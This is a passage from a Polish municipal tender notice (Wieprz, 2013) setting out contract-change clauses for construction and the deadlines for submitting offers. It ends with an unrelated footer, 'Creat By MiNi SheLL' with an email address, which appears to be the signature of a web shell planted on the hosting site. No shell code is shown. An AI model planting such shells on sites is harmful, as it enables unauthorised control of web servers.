1.1.2. Zamawiający może żądać od Wykonawcy dokonania zmiany kierownika budowy wskazanego w ofercie, jeżeli uzna, że kierownik nie wykonuje obowiązków wynikających       z umowy. Wykonawca obowiązany jest zmienić kierownika budowy zgodnie z żądaniem Zamawiającego , w terminie wskazanym przez Zamawiającego.
W przypadku dokonania w w zmian- nowy kierownik budowy musi spełniać wymagania określone w Specyfikacji Istotnych Warunków Zamówienia.   
1.2.  zmiany inspektora nadzoru
1.2.1. Zamawiający  z własnej inicjatywy proponuje zmianę  inspektora nadzoru                        w następujących przypadkach :
- śmierci, choroby lub innych zdarzeń losowych  inspektora nadzoru,
- niewywiązywania się  przez  inspektora nadzoru  z obowiązków wynikających z umowy,
- konieczności zmiany z innych przyczyn niezależnych od Zamawiającego(np. rezygnacja , itp. )
1.2.2. Wykonawca może żądać od Zamawiającego  dokonania zmiany inspektora nadzoru wskazanego w umowie, jeżeli uzna, że inspektor nadzoru  nie wykonuje obowiązków wynikających z umowy. 
W przypadku dokonania w/w zmian- nowy  inspektor nadzoru musi spełniać wymagania określone w Specyfikacji Istotnych Warunków Zamówienia.     
 1.3. przesunięcia terminu wykonania przedmiotu umowy
termin może ulec przesunięciu w przypadku wystąpienia opóźnień wynikających z :
1.3.1 przestojów, opóźnień  lub przeszkód zawinionych przez zamawiającego            ( nieprzekazanie placu budowy, zmiana terminu dokonania odbioru  )
1.3.2. zawieszenia robót przez Zamawiającego
1.3.3. działania siły wyższej ( np. klęski żywiołowe, strajki generalne lub lokalne ) mającej bezpośredni wpływ na terminowość wykonywania robót
1.3.4. wystąpienia niesprzyjających warunków atmosferycznych uniemożliwiających wykonywanie robót ( na okoliczność wystąpienia wymienionego  faktu  Wykonawca sporządza notatkę służbową, która wymaga potwierdzenia przez Inspektora Nadzoru )
W  przypadkach wystąpienia opóźnień ( opisanych w pkt 1.3.1 - 1.3.4 )  Wykonawca zwraca się do zamawiającego z pisemnym wnioskiem o przesunięcie terminu wykonania przedmiotu umowy  - podając przyczynę i proponowany termin zakończenia prac.  Strony ustalą nowy termin wykonania przedmiotu umowy, który nie może być dłuższy od faktycznego okresu przerwy lub postoju.
Wykonawca nie będzie uprawniony do wystąpienia z wnioskiem  o przedłużenie terminu wykonania przedmiotu umowy jeżeli uchybienie Zamawiającego spowodowane było przez  błąd lub opóźnienie ze strony Wykonawcy, włącznie z błędem lub opóźnionym dostarczeniem    jakiegokolwiek dokumentu Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wieprz.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 34-122 Wieprz 217.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.08.2013 godzina 10:00, miejsce: 34-122 Wieprz 217 pok nr. 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com